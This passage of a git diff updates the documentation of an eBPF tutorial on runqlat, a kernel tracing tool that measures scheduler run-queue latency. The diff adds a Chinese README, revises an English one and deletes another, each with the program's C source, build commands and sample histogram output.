map with the `pid` key and the timestamp value. ```c static int trace_enqueue(u32 tgid, u32 pid) @@ -287,7 +282,7 @@ static int trace_enqueue(u32 tgid, u32 pid) } ``` -pid_namespace 函数用于获取进程所属的 PID namespace: +- `pid_namespace`: This function is used to get the PID namespace of a process. It takes a `task_struct` pointer as a parameter and returns the PID namespace of the process. The function retrieves the PID namespace by following `task_active_pid_ns()` and `pid->numbers[pid->level].ns`. ```c static unsigned int pid_namespace(struct task_struct *task) @@ -309,7 +304,7 @@ static unsigned int pid_namespace(struct task_struct *task) } ``` -handle_switch 函数是核心部分,用于处理调度切换事件,计算进程调度延迟并更新直方图数据: +The `handle_switch` function is the core part, used to handle scheduling switch events, calculate process scheduling latency, and update histogram data: ```c static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) @@ -318,27 +313,27 @@ static int handle_switch(bool preempt, struct task_struct *prev, struct task_str } ``` -首先,函数根据 filter_cg 的设置判断是否需要过滤 cgroup。然后,如果之前的进程状态为 TASK_RUNNING,则调用 trace_enqueue 函数记录进程的入队时间。接着,函数查找下一个进程的入队时间戳,如果找不到,直接返回。计算调度延迟(delta),并根据不同的选项设置(targ_per_process,targ_per_thread,targ_per_pidns),确定直方图映射的键(hkey)。然后查找或初始化直方图映射,更新直方图数据,最后删除进程的入队时间戳记录。 +Firstly, the function determines whether to filter cgroup based on the setting of `filter_cg`. 
Then, if the previous process state is `TASK_RUNNING`, the `trace_enqueue` function is called to record the enqueue time of the process. Then, the function looks up the enqueue timestamp of the next process. If it is not found, it returns directly. The scheduling latency (delta) is calculated, and the key for the histogram map (hkey) is determined based on different options (targ_per_process, targ_per_thread, targ_per_pidns). Then, the histogram map is looked up or initialized, and the histogram data is updated. Finally, the enqueue timestamp record of the process is deleted. -接下来是 eBPF 程序的入口点。程序使用三个入口点来捕获不同的调度事件: +Next is the entry point of the eBPF program. The program uses three entry points to capture different scheduling events: -- handle_sched_wakeup:用于处理 sched_wakeup 事件,当一个进程从睡眠状态被唤醒时触发。 -- handle_sched_wakeup_new:用于处理 sched_wakeup_new 事件,当一个新创建的进程被唤醒时触发。 -- handle_sched_switch:用于处理 sched_switch 事件,当调度器选择一个新的进程运行时触发。 +- `handle_sched_wakeup`: Used to handle the `sched_wakeup` event triggered when a process is woken up from sleep state. +- `handle_sched_wakeup_new`: Used to handle the `sched_wakeup_new` event triggered when a newly created process is woken up. +- `handle_sched_switch`: Used to handle the `sched_switch` event triggered when the scheduler selects a new process to run. -这些入口点分别处理不同的调度事件,但都会调用 handle_switch 函数来计算进程的调度延迟并更新直方图数据。 +These entry points handle different scheduling events, but all call the `handle_switch` function to calculate the scheduling latency of the process and update the histogram data. -最后,程序包含一个许可证声明: +Finally, the program includes a license declaration: ```c char LICENSE[] SEC("license") = "GPL"; ``` -这一声明指定了 eBPF 程序的许可证类型,这里使用的是 "GPL"。这对于许多内核功能是必需的,因为它们要求 eBPF 程序遵循 GPL 许可证。 +This declaration specifies the license type of the eBPF program, which is "GPL" in this case. This is required for many kernel features as they require eBPF programs to follow the GPL license. ### runqlat.h -然后我们需要定义一个头文件`runqlat.h`,用来给用户态处理从内核态上报的事件: +Next, we need to define a header file `runqlat.h` for handling events reported from kernel mode to user mode: ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -349,16 +344,16 @@ char LICENSE[] SEC("license") = "GPL"; #define MAX_SLOTS 26 struct hist { - __u32 slots[MAX_SLOTS]; - char comm[TASK_COMM_LEN]; + __u32 slots[MAX_SLOTS]; + char comm[TASK_COMM_LEN]; }; #endif /* __RUNQLAT_H */ ``` -## 编译运行 +## Compilation and Execution -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +We will use `eunomia-bpf` to compile and run this example. You can refer to to download and install the `ecc` compilation toolkit and `ecli` runtime. Compile: @@ -366,7 +361,7 @@ Compile: docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或者 +or ```console $ ecc runqlat.bpf.c runqlat.h @@ -384,18 +379,15 @@ Usage: runqlat_bpf [--help] [--version] [--verbose] [--filter_cg] [--targ_per_pr A simple eBPF program Optional arguments: - -h, --help shows help message and exits - -v, --version prints version information and exits - --verbose prints libbpf debug information - --filter_cg set value of bool variable filter_cg - --targ_per_process set value of bool variable targ_per_process - --targ_per_thread set value of bool variable targ_per_thread - --targ_per_pidns set value of bool variable targ_per_pidns - --targ_ms set value of bool variable targ_ms - --targ_tgid set value of pid_t variable targ_tgid - -Built with eunomia-bpf framework. 
-See https://github.com/eunomia-bpf/eunomia-bpf for more information. +-h, --help shows help message and exits +-v, --version prints version information and exits +--verbose prints libbpf debug information +--filter_cg set value of bool variable filter_cg +--targ_per_process set value of bool variable targ_per_process +--targ_per_thread set value of bool variable targ_per_thread +--targ_per_pidns set value of bool variable targ_per_pidns +--targ_ms set value of bool variable targ_ms +--targ_tgid set value of pid_t variable targ_tgid $ sudo ecli run examples/bpftools/runqlat/package.json key = 4294967295 @@ -419,7 +411,7 @@ comm = rcu_preempt 16384 -> 32767 : 1 | | $ sudo ecli run examples/bpftools/runqlat/package.json --targ_per_process -key = 3189 +key = 3189 comm = cpptools (unit) : count distribution @@ -431,19 +423,20 @@ comm = cpptools 32 -> 63 : 11 |****************************************| 64 -> 127 : 8 |***************************** | 128 -> 255 : 3 |********** | + ``` -完整源代码请见: +Complete source code can be found at: -参考资料: +References: - - -## 总结 +## Summary -runqlat 是一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序运行队列延迟,显示任务等待运行在 CPU 上的时间长度。编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令。 +runqlat is a Linux kernel BPF program that summarizes scheduler run queue latency using a bar chart to show the length of time tasks wait to run on a CPU. To compile this program, you can use the `ecc` tool and to run it, you can use the `ecli` command. -runqlat 是一种用于监控Linux内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间,并根据这些信息优化进程调度,提高系统的性能。可以在 libbpf-tools 中找到最初的源代码: +runqlat is a tool for monitoring process scheduling latency in the Linux kernel. It can help you understand the time processes spend waiting to run in the kernel and optimize process scheduling based on this information to improve system performance. The original source code can be found in libbpf-tools: -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. diff --git a/src/9-runqlat/README.zh.md b/src/9-runqlat/README.zh.md new file mode 100755 index 0000000..812b1f7 --- /dev/null +++ b/src/9-runqlat/README.zh.md @@ -0,0 +1,449 @@ +# eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +runqlat 是一个 eBPF 工具,用于分析 Linux 系统的调度性能。具体来说,runqlat 用于测量一个任务在被调度到 CPU 上运行之前在运行队列中等待的时间。这些信息对于识别性能瓶颈和提高 Linux 内核调度算法的整体效率非常有用。 + +## runqlat 原理 + +本教程是 eBPF 入门开发实践系列的第九部分,主题是 "捕获进程调度延迟"。在此,我们将介绍一个名为 runqlat 的程序,其作用是以直方图的形式记录进程调度延迟。 + +Linux 操作系统使用进程来执行所有的系统和用户任务。这些进程可能被阻塞、杀死、运行,或者正在等待运行。处在后两种状态的进程数量决定了 CPU 运行队列的长度。 + +进程有几种可能的状态,如: + +- 可运行或正在运行 +- 可中断睡眠 +- 不可中断睡眠 +- 停止 +- 僵尸进程 + +等待资源或其他函数信号的进程会处在可中断或不可中断的睡眠状态:进程被置入睡眠状态,直到它需要的资源变得可用。然后,根据睡眠的类型,进程可以转移到可运行状态,或者保持睡眠。 + +即使进程拥有它需要的所有资源,它也不会立即开始运行。它会转移到可运行状态,与其他处在相同状态的进程一起排队。CPU可以在接下来的几秒钟或毫秒内执行这些进程。调度器为 CPU 排列进程,并决定下一个要执行的进程。 + +根据系统的硬件配置,这个可运行队列(称为 CPU 运行队列)的长度可以短也可以长。短的运行队列长度表示 CPU 没有被充分利用。另一方面,如果运行队列长,那么可能意味着 CPU 不够强大,无法执行所有的进程,或者 CPU 的核心数量不足。在理想的 CPU 利用率下,运行队列的长度将等于系统中的核心数量。 + +进程调度延迟,也被称为 "run queue latency",是衡量线程从变得可运行(例如,接收到中断,促使其处理更多工作)到实际在 CPU 上运行的时间。在 CPU 饱和的情况下,你可以想象线程必须等待其轮次。但在其他奇特的场景中,这也可能发生,而且在某些情况下,它可以通过调优减少,从而提高整个系统的性能。 + +我们将通过一个示例来阐述如何使用 runqlat 工具。这是一个负载非常重的系统: + +```shell +# runqlat +Tracing run queue latency... Hit Ctrl-C to end. 
+^C
+ usecs : count distribution
+ 0 -> 1 : 233 |*********** |
+ 2 -> 3 : 742 |************************************ |
+ 4 -> 7 : 203 |********** |
+ 8 -> 15 : 173 |******** |
+ 16 -> 31 : 24 |* |
+ 32 -> 63 : 0 | |
+ 64 -> 127 : 30 |* |
+ 128 -> 255 : 6 | |
+ 256 -> 511 : 3 | |
+ 512 -> 1023 : 5 | |
+ 1024 -> 2047 : 27 |* |
+ 2048 -> 4095 : 30 |* |
+ 4096 -> 8191 : 20 | |
+ 8192 -> 16383 : 29 |* |
+ 16384 -> 32767 : 809 |****************************************|
+ 32768 -> 65535 : 64 |*** |
+```
+
+在这个输出中,我们看到了一个双模分布,一个模在0到15微秒之间,另一个模在16到65毫秒之间。这些模式在分布(它仅仅是 "count" 列的视觉表示)中显示为尖峰。例如,读取一行:在追踪过程中,809个事件落入了16384到32767微秒的范围(16到32毫秒)。
+
+在后续的教程中,我们将深入探讨如何利用 eBPF 对此类指标进行深度跟踪和分析,以更好地理解和优化系统性能。同时,我们也将学习更多关于 Linux 内核调度器、中断处理和 CPU 饱和等方面的知识。
+
+runqlat 的实现利用了 eBPF 程序,它通过内核跟踪点和函数探针来测量进程在运行队列中的时间。当进程被排队时,trace_enqueue 函数会在一个映射中记录时间戳。当进程被调度到 CPU 上运行时,handle_switch 函数会检索时间戳,并计算当前时间与排队时间之间的时间差。这个差值(或 delta)被用于更新进程的直方图,该直方图记录运行队列延迟的分布。该直方图可用于分析 Linux 内核的调度性能。
+
+## runqlat 代码实现
+
+### runqlat.bpf.c
+
+首先我们需要编写一个源代码文件 runqlat.bpf.c:
+
+```c
+// SPDX-License-Identifier: GPL-2.0
+// Copyright (c) 2020 Wenbo Zhang
+#include <vmlinux.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_core_read.h>
+#include <bpf/bpf_tracing.h>
+#include "runqlat.h"
+#include "bits.bpf.h"
+#include "maps.bpf.h"
+#include "core_fixes.bpf.h"
+
+#define MAX_ENTRIES 10240
+#define TASK_RUNNING 0
+
+const volatile bool filter_cg = false;
+const volatile bool targ_per_process = false;
+const volatile bool targ_per_thread = false;
+const volatile bool targ_per_pidns = false;
+const volatile bool targ_ms = false;
+const volatile pid_t targ_tgid = 0;
+
+struct {
+ __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY);
+ __type(key, u32);
+ __type(value, u32);
+ __uint(max_entries, 1);
+} cgroup_map SEC(".maps");
+
+struct {
+ __uint(type, BPF_MAP_TYPE_HASH);
+ __uint(max_entries, MAX_ENTRIES);
+ __type(key, u32);
+ __type(value, u64);
+} start SEC(".maps");
+
+static struct hist zero;
+
+/// @sample {"interval": 1000, "type" : "log2_hist"}
+struct {
+ __uint(type, BPF_MAP_TYPE_HASH);
+ __uint(max_entries, MAX_ENTRIES);
+ __type(key, u32);
+ __type(value, struct hist);
+} hists SEC(".maps");
+
+static int trace_enqueue(u32 tgid, u32 pid)
+{
+ u64 ts;
+
+ if (!pid)
+ return 0;
+ if (targ_tgid && targ_tgid != tgid)
+ return 0;
+
+ ts = bpf_ktime_get_ns();
+ bpf_map_update_elem(&start, &pid, &ts, BPF_ANY);
+ return 0;
+}
+
+static unsigned int pid_namespace(struct task_struct *task)
+{
+ struct pid *pid;
+ unsigned int level;
+ struct upid upid;
+ unsigned int inum;
+
+ /* get the pid namespace by following task_active_pid_ns(),
+ * pid->numbers[pid->level].ns
+ */
+ pid = BPF_CORE_READ(task, thread_pid);
+ level = BPF_CORE_READ(pid, level);
+ bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]);
+ inum = BPF_CORE_READ(upid.ns, ns.inum);
+
+ return inum;
+}
+
+static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next)
+{
+ struct hist *histp;
+ u64 *tsp, slot;
+ u32 pid, hkey;
+ s64 delta;
+
+ if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
+ return 0;
+
+ if (get_task_state(prev) == TASK_RUNNING)
+ trace_enqueue(BPF_CORE_READ(prev, tgid), BPF_CORE_READ(prev, pid));
+
+ pid = BPF_CORE_READ(next, pid);
+
+ tsp = bpf_map_lookup_elem(&start, &pid);
+ if (!tsp)
+ return 0;
+ delta = bpf_ktime_get_ns() - *tsp;
+ if (delta < 0)
+ goto cleanup;
+
+ if (targ_per_process)
+ hkey = BPF_CORE_READ(next, tgid);
+ else if (targ_per_thread)
+ hkey = pid;
+ else if (targ_per_pidns)
+ hkey = pid_namespace(next);
+ else
+ hkey = -1;
+ histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero);
+ if
(!histp) + goto cleanup; + if (!histp->comm[0]) + bpf_probe_read_kernel_str(&histp->comm, sizeof(histp->comm), + next->comm); + if (targ_ms) + delta /= 1000000U; + else + delta /= 1000U; + slot = log2l(delta); + if (slot >= MAX_SLOTS) + slot = MAX_SLOTS - 1; + __sync_fetch_and_add(&histp->slots[slot], 1); + +cleanup: + bpf_map_delete_elem(&start, &pid); + return 0; +} + +SEC("raw_tp/sched_wakeup") +int BPF_PROG(handle_sched_wakeup, struct task_struct *p) +{ + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); +} + +SEC("raw_tp/sched_wakeup_new") +int BPF_PROG(handle_sched_wakeup_new, struct task_struct *p) +{ + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); +} + +SEC("raw_tp/sched_switch") +int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next) +{ + return handle_switch(preempt, prev, next); +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +这其中定义了一些常量和全局变量,用于过滤对应的追踪目标: + +```c +#define MAX_ENTRIES 10240 +#define TASK_RUNNING 0 + +const volatile bool filter_cg = false; +const volatile bool targ_per_process = false; +const volatile bool targ_per_thread = false; +const volatile bool targ_per_pidns = false; +const volatile bool targ_ms = false; +const volatile pid_t targ_tgid = 0; +``` + +这些变量包括最大映射项数量、任务状态、过滤选项和目标选项。这些选项可以通过用户空间程序设置,以定制 eBPF 程序的行为。 + +接下来,定义了一些 eBPF 映射: + +```c +struct { + __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); + __type(key, u32); + __type(value, u32); + __uint(max_entries, 1); +} cgroup_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, u64); +} start SEC(".maps"); + +static struct hist zero; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, struct hist); +} hists SEC(".maps"); +``` + +这些映射包括: + +- cgroup_map 用于过滤 cgroup; +- start 用于存储进程入队时的时间戳; +- hists 用于存储直方图数据,记录进程调度延迟。 + +接下来是一些辅助函数: + +trace_enqueue 函数用于在进程入队时记录其时间戳: + +```c +static int trace_enqueue(u32 tgid, u32 pid) +{ + u64 ts; + + if (!pid) + return 0; + if (targ_tgid && targ_tgid != tgid) + return 0; + + ts = bpf_ktime_get_ns(); + bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); + return 0; +} +``` + +pid_namespace 函数用于获取进程所属的 PID namespace: + +```c +static unsigned int pid_namespace(struct task_struct *task) +{ + struct pid *pid; + unsigned int level; + struct upid upid; + unsigned int inum; + + /* get the pid namespace by following task_active_pid_ns(), + * pid->numbers[pid->level].ns + */ + pid = BPF_CORE_READ(task, thread_pid); + level = BPF_CORE_READ(pid, level); + bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); + inum = BPF_CORE_READ(upid.ns, ns.inum); + + return inum; +} +``` + +handle_switch 函数是核心部分,用于处理调度切换事件,计算进程调度延迟并更新直方图数据: + +```c +static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) +{ + ... 
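+ /* Full body shown in the listing above. In outline:
+  * 1. if filter_cg is set, filter by cgroup first;
+  * 2. if prev is still TASK_RUNNING, record its re-enqueue time via trace_enqueue();
+  * 3. look up next's enqueue timestamp in the start map and compute the latency delta;
+  * 4. choose the histogram key hkey (tgid / pid / pid namespace / -1) from the targ_* options;
+  * 5. bump the matching log2 slot in hists, then delete the timestamp from start.
+  */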
+} +``` + +首先,函数根据 filter_cg 的设置判断是否需要过滤 cgroup。然后,如果之前的进程状态为 TASK_RUNNING,则调用 trace_enqueue 函数记录进程的入队时间。接着,函数查找下一个进程的入队时间戳,如果找不到,直接返回。计算调度延迟(delta),并根据不同的选项设置(targ_per_process,targ_per_thread,targ_per_pidns),确定直方图映射的键(hkey)。然后查找或初始化直方图映射,更新直方图数据,最后删除进程的入队时间戳记录。 + +接下来是 eBPF 程序的入口点。程序使用三个入口点来捕获不同的调度事件: + +- handle_sched_wakeup:用于处理 sched_wakeup 事件,当一个进程从睡眠状态被唤醒时触发。 +- handle_sched_wakeup_new:用于处理 sched_wakeup_new 事件,当一个新创建的进程被唤醒时触发。 +- handle_sched_switch:用于处理 sched_switch 事件,当调度器选择一个新的进程运行时触发。 + +这些入口点分别处理不同的调度事件,但都会调用 handle_switch 函数来计算进程的调度延迟并更新直方图数据。 + +最后,程序包含一个许可证声明: + +```c +char LICENSE[] SEC("license") = "GPL"; +``` + +这一声明指定了 eBPF 程序的许可证类型,这里使用的是 "GPL"。这对于许多内核功能是必需的,因为它们要求 eBPF 程序遵循 GPL 许可证。 + +### runqlat.h + +然后我们需要定义一个头文件`runqlat.h`,用来给用户态处理从内核态上报的事件: + +```c +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +#ifndef __RUNQLAT_H +#define __RUNQLAT_H + +#define TASK_COMM_LEN 16 +#define MAX_SLOTS 26 + +struct hist { + __u32 slots[MAX_SLOTS]; + char comm[TASK_COMM_LEN]; +}; + +#endif /* __RUNQLAT_H */ +``` + +## 编译运行 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +Compile: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或者 + +```console +$ ecc runqlat.bpf.c runqlat.h +Compiling bpf object... +Generating export types... +Packing ebpf object and config into package.json... +``` + +Run: + +```console +$ sudo ecli run examples/bpftools/runqlat/package.json -h +Usage: runqlat_bpf [--help] [--version] [--verbose] [--filter_cg] [--targ_per_process] [--targ_per_thread] [--targ_per_pidns] [--targ_ms] [--targ_tgid VAR] + +A simple eBPF program + +Optional arguments: + -h, --help shows help message and exits + -v, --version prints version information and exits + --verbose prints libbpf debug information + --filter_cg set value of bool variable filter_cg + --targ_per_process set value of bool variable targ_per_process + --targ_per_thread set value of bool variable targ_per_thread + --targ_per_pidns set value of bool variable targ_per_pidns + --targ_ms set value of bool variable targ_ms + --targ_tgid set value of pid_t variable targ_tgid + +Built with eunomia-bpf framework. +See https://github.com/eunomia-bpf/eunomia-bpf for more information. 
+ +$ sudo ecli run examples/bpftools/runqlat/package.json +key = 4294967295 +comm = rcu_preempt + + (unit) : count distribution + 0 -> 1 : 9 |**** | + 2 -> 3 : 6 |** | + 4 -> 7 : 12 |***** | + 8 -> 15 : 28 |************* | + 16 -> 31 : 40 |******************* | + 32 -> 63 : 83 |****************************************| + 64 -> 127 : 57 |*************************** | + 128 -> 255 : 19 |********* | + 256 -> 511 : 11 |***** | + 512 -> 1023 : 2 | | + 1024 -> 2047 : 2 | | + 2048 -> 4095 : 0 | | + 4096 -> 8191 : 0 | | + 8192 -> 16383 : 0 | | + 16384 -> 32767 : 1 | | + +$ sudo ecli run examples/bpftools/runqlat/package.json --targ_per_process +key = 3189 +comm = cpptools + + (unit) : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 1 |*** | + 16 -> 31 : 2 |******* | + 32 -> 63 : 11 |****************************************| + 64 -> 127 : 8 |***************************** | + 128 -> 255 : 3 |********** | +``` + +完整源代码请见: + +参考资料: + +- +- + +## 总结 + +runqlat 是一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序运行队列延迟,显示任务等待运行在 CPU 上的时间长度。编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令。 + +runqlat 是一种用于监控Linux内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间,并根据这些信息优化进程调度,提高系统的性能。可以在 libbpf-tools 中找到最初的源代码: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/9-runqlat/README_en.md b/src/9-runqlat/README_en.md deleted file mode 100755 index ffd3377..0000000 --- a/src/9-runqlat/README_en.md +++ /dev/null @@ -1,442 +0,0 @@ -# eBPF Tutorial by Example 9: Capturing Scheduling Latency and Recording as Histogram - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime. - -runqlat is an eBPF tool used for analyzing the scheduling performance of the Linux system. Specifically, runqlat is used to measure the time a task waits in the run queue before being scheduled to run on a CPU. This information is very useful for identifying performance bottlenecks and improving the overall efficiency of the Linux kernel scheduling algorithm. - -## runqlat Principle - -This tutorial is the ninth part of the eBPF beginner's development series, with the topic "Capturing Process Scheduling Latency". Here, we will introduce a program called runqlat, which records process scheduling latency as a histogram. - -The Linux operating system uses processes to execute all system and user tasks. These processes can be blocked, killed, running, or waiting to run. The number of processes in the latter two states determines the length of the CPU run queue. - -Processes can have several possible states, such as: - -- Runnable or running -- Interruptible sleep -- Uninterruptible sleep -- Stopped -- Zombie process - -Processes waiting for resources or other function signals are in the interruptible or uninterruptible sleep state: the process is put to sleep until the resource it needs becomes available. Then, depending on the type of sleep, the process can transition to the runnable state or remain asleep. - -Even when a process has all the resources it needs, it does not start running immediately. It transitions to the runnable state and is queued together with other processes in the same state. The CPU can execute these processes in the next few seconds or milliseconds. The scheduler arranges the processes for the CPU and determines the next process to run. 
- -Depending on the hardware configuration of the system, the length of this runnable queue (known as the CPU run queue) can be short or long. A short run queue length indicates that the CPU is not being fully utilized. On the other hand, if the run queue is long, it may mean that the CPU is not powerful enough to handle all the processes or that the number of CPU cores is insufficient. In an ideal CPU utilization, the length of the run queue will be equal to the number of cores in the system. - -Process scheduling latency, also known as "run queue latency," is the time it takes for a thread to go from becoming runnable (e.g., receiving an interrupt that prompts it to do more work) to actually running on the CPU. In the case of CPU saturation, you can imagine that the thread has to wait for its turn. But in other peculiar scenarios, this can also happen, and in some cases, it can be reduced by tuning to improve the overall system performance. - -We will illustrate how to use the runqlat tool through an example. This is a heavily loaded system: - -```shell -# runqlat -Tracing run queue latency... Hit Ctrl-C to end. -^C - usecs : count distribution - 0 -> 1 : 233 |*********** | - 2 -> 3 : 742 |************************************ | - 4 -> 7 : 203 |********** | - 8 -> 15 : 173 |******** | - 16 -> 31 : 24 |* | - 32 -> 63 : 0 | | - 64 -> 127 : 30 |* | - 128 -> 255 : 6 | | - 256 -> 511 : 3 | | - 512 -> 1023 : 5 | | - 1024 -> 2047 : 27 |* | -``` - -## runqlat Code Implementation - -### runqlat.bpf.c - -First, we need to write a source code file `runqlat.bpf.c`: - -```c -// SPDX-License-Identifier: GPL-2.0 -// Copyright (c) 2020 Wenbo Zhang -#include -#include -#include -#include -#include "runqlat.h" -#include "bits.bpf.h" -#include "maps.bpf.h" -#include "core_fixes.bpf.h" - -#define MAX_ENTRIES 10240 -#define TASK_RUNNING 0 - -const volatile bool filter_cg = false; -const volatile bool targ_per_process = false; -const volatile bool targ_per_thread = false; -const volatile bool targ_per_pidns = false; -const volatile bool targ_ms = false; -const volatile pid_t targ_tgid = 0; - -struct { - __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); - __type(key, u32); - __type(value, u32); - __uint(max_entries, 1); -} cgroup_map SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u32); - __type(value, u64); -} start SEC(".maps"); - -static struct hist zero; - -/// @sample {"interval": 1000, "type" : "log2_hist"} -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u32); - __type(value, struct hist); -} hists SEC(".maps"); - -static int trace_enqueue(u32 tgid, u32 pid) -{ -u64 ts; - -if (!pid) - return 0; -if (targ_tgid && targ_tgid != tgid) - return 0; - -ts = bpf_ktime_get_ns(); -bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); -return 0; -} - -static unsigned int pid_namespace(struct task_struct *task) -{ -struct pid *pid; -unsigned int level; -struct upid upid; -unsigned int inum; - -/* get the pid namespace by following task_active_pid_ns(), - * pid->numbers[pid->level].ns - */ -pid = BPF_CORE_READ(task, thread_pid); -level = BPF_CORE_READ(pid, level); -bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); -inum = BPF_CORE_READ(upid.ns, ns.inum); - -return inum; -} - -static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) -{ -struct hist *histp; -u64 *tsp, slot; -u32 pid, hkey; -s64 delta; - -if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - 
-if (get_task_state(prev) == TASK_RUNNING) - trace_enqueue(BPF_CORE_READ(prev, tgid), BPF_CORE_READ(prev, pid)); - -pid = BPF_CORE_READ(next, pid); - -tsp = bpf_map_lookup_elem(&start, &pid); -if (!tsp) - return 0; -delta = bpf_ktime_get_ns() - *tsp; -if (delta < 0) - goto cleanup; - -if (targ_per_process) - hkey = BPF_CORE_READ(next, tgid); -else if (targ_per_thread) - hkey = pid; -else if (targ_per_pidns) - hkey = pid_namespace(next); -else - hkey = -1; -histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero); -if (!histp) - goto cleanup; -if (!histp->comm[0]) - bpf_probe_read_kernel_str(&histp->comm, sizeof(histp->comm), - next->comm); -if (targ_ms) - delta /= 1000000U; -else - delta /= 1000U; -slot = log2l(delta); -if (slot >= MAX_SLOTS) - slot = MAX_SLOTS - 1; -__sync_fetch_and_add(&histp->slots[slot], 1); - -cleanup: -bpf_map_delete_elem(&start, &pid); -return 0; -} - -SEC("raw_tp/sched_wakeup") -int BPF_PROG(handle_sched_wakeup, struct task_struct *p) -{ - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); -} - -SEC("raw_tp/sched_wakeup_new") -int BPF_PROG(handle_sched_wakeup_new, struct task_struct *p) -{ - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); -} - -SEC("raw_tp/sched_switch") -int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next) -{ - return handle_switch(preempt, prev, next); -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -#### Constants and Global Variables - -The code defines several constants and volatile global variables used for filtering corresponding tracing targets. These variables include: - -```c -#define MAX_ENTRIES 10240 -#define TASK_RUNNING 0 - -const volatile bool filter_cg = false; -const volatile bool targ_per_process = false; -const volatile bool targ_per_thread = false; -const volatile bool targ_per_pidns = false; -const volatile bool targ_ms = false; -const volatile pid_t targ_tgid = 0; -``` - -- `MAX_ENTRIES`: The maximum number of map entries. -- `TASK_RUNNING`: The task status value. -- `filter_cg`, `targ_per_process`, `targ_per_thread`, `targ_per_pidns`, `targ_ms`, `targ_tgid`: Boolean variables for filtering and target options. These options can be set by user-space programs to customize the behavior of the eBPF program. - -#### eBPF Maps - -The code defines several eBPF maps including: - -```c -struct { - __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); - __type(key, u32); - __type(value, u32); - __uint(max_entries, 1); -} cgroup_map SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u32); - __type(value, u64); -} start SEC(".maps"); - -static struct hist zero; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u32); - __type(value, struct hist); -} hists SEC(".maps"); -``` - -- `cgroup_map`: A cgroup array map used for filtering cgroups. -- `start`: A hash map used to store timestamps when processes are enqueued. -- `hists`: A hash map used to store histogram data for recording process scheduling delays. - -#### Helper Functions - -The code includes two helper functions: - -- `trace_enqueue`: This function is used to record the timestamp when a process is enqueued. It takes the `tgid` and `pid` values as parameters. 
